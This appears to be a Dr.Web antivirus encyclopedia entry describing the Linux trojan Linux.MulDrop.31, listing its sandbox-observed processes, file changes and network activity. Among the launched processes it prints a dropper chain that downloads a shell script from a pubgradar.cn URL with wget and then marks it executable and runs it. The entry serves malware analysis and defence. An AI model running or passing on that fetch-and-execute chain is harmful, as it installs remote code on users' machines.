La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

Linux.MulDrop.31

Aggiunto al database dei virus Dr.Web: 2018-05-04

La descrizione è stata aggiunta:

Technical Information

Malicious functions:
Performs process tracing:
  • <SAMPLE>
  • <SAMPLE_FULL_PATH>
Launches processes:
  • /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/bash <SAMPLE_FULL_PATH> -c
  • wget https://www.pubgradar.cn/shell/1851515149/pubgss.sh
  • chmod +x pubgss.sh
  • ./pubgss.sh
  • tee pubgss.log
  • bash ./pubgss.sh
  • grep -Eqi debian
  • cat /etc/issue
  • clear
  • expr 6666 + 1
  • stty -g
  • stty -echo
  • stty cbreak
  • dd if=/dev/tty bs=1 count=1
  • stty -raw
  • stty echo
  • stty
  • apt-get -y update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.9i96ni /tmp/apt.data.eAYBBk
  • /usr/lib/apt/methods/bzip2
  • /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.Ad4g4u /tmp/apt.data.cWXGCF
Kills the following processes:
  • <SAMPLE>
  • <SAMPLE_FULL_PATH>
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/bzip2
Performs operations with the file system:
Modifies file access rights:
  • /root/pubgss.sh
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp.l4V0iZ
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_main_source_Sources
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2.decomp.cVgubm
Creates or modifies files:
  • /root/pubgss.sh
  • /root/pubgss.log
  • /var/lib/apt/lists/lock
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /tmp/apt.sig.9i96ni
  • /tmp/apt.data.eAYBBk
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /tmp/fileutl.message.6OKN6c
  • /tmp/fileutl.message.6OKN6c (deleted)
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release
  • /tmp/apt.sig.Ad4g4u
  • /tmp/apt.data.cWXGCF
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp.l4V0iZ
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_i18n_Translation-en.bz2
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2.decomp.cVgubm
  • /tmp/fileutl.message.Qmt4yA
  • /tmp/fileutl.message.Qmt4yA (deleted)
Deletes files:
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /tmp/apt.sig.9i96ni
  • /tmp/apt.data.eAYBBk
  • /tmp/fileutl.message.6OKN6c
  • /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources
  • /tmp/apt.sig.Ad4g4u
  • /tmp/apt.data.cWXGCF
  • /tmp/fileutl.message.Qmt4yA
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 18#.##4.86.225:0
  • 18#.##4.86.253:0
  • 18#.##4.86.227:0
  • 18#.##4.86.224:0
  • 18#.##4.86.228:0
  • 18#.##4.86.231:0
  • 18#.##4.86.226:0
  • 18#.##4.86.225:443
  • 21#.##6.149.233:80
  • [2#########:1:216:35ff:fe7f:6ceb]:80
  • [2#######8:dc41:100::233]:80
HTTP GET requests:
  • ft#.##.######.org/debian/dists/jessie/InRelease
  • se######.#####n.org/dists/jessie/updates/InRelease
  • ft#.##.######.#rg/debian/dists/jessie-updates/InRelease
  • ft#.##.######.org/debian/dists/jessie/Release.gpg
  • ft#.##.######.org/debian/dists/jessie/Release
  • se######.######.##g/dists/jessie/updates/main/source/Sources.bz2
  • se######.######.###/dists/jessie/updates/main/binary-amd64/Packages.bz2
  • se######.######.###/dists/jessie/updates/main/i18n/Translation-en.bz2
DNS ASK:
  • ww#.##bgradar.cn
  • se####ty.debian.org
  • ft#.##.debian.org
Sends data to the following servers:
  • 18#.##4.86.225:443
Receives data from the following servers:
  • 18#.##4.86.225:443
Other:
Collects OS information
Collects RAM information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number